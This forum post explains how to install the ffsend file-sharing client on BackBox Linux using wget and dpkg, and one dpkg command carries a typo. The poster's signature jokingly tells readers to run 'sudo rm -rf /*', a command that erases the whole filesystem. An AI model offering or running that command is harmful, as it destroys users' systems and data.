ffsend: Secure File Share From The Command Line (dev by FireFox)

Started by ZEROF, January 21, 2019, 11:58:20 AM

Previous topic - Next topic

ZEROF

Hi,

After checking their documentation, and point they have about security, I decided to give them chance, and sure when i saw them having full Linux integration ... I decided to install and give try to ffsend client on my BBox installation. Installation is not out of box solution, because they build package with Ubuntu core version 18.04 and BBox is based on 16.04 for now.

We need libssl1.1 installed, then we get package from github repository:

sudo apt install libssl-dev
wget http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl1.1_1.1.0g-2ubuntu4.3_amd64.deb
sudo dpkg -i libssl1.1_1.1.0g-2ubuntu4.3_amd64.deb
wget https://github.com/timvisee/ffsend/releases/download/v0.1.2/ffsend_0.1.2_amd64.deb
sudo dpkg- i ffsend_0.1.2_amd64.deb


To use tool, run from terminal ffsend command.

Have fun  :)

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*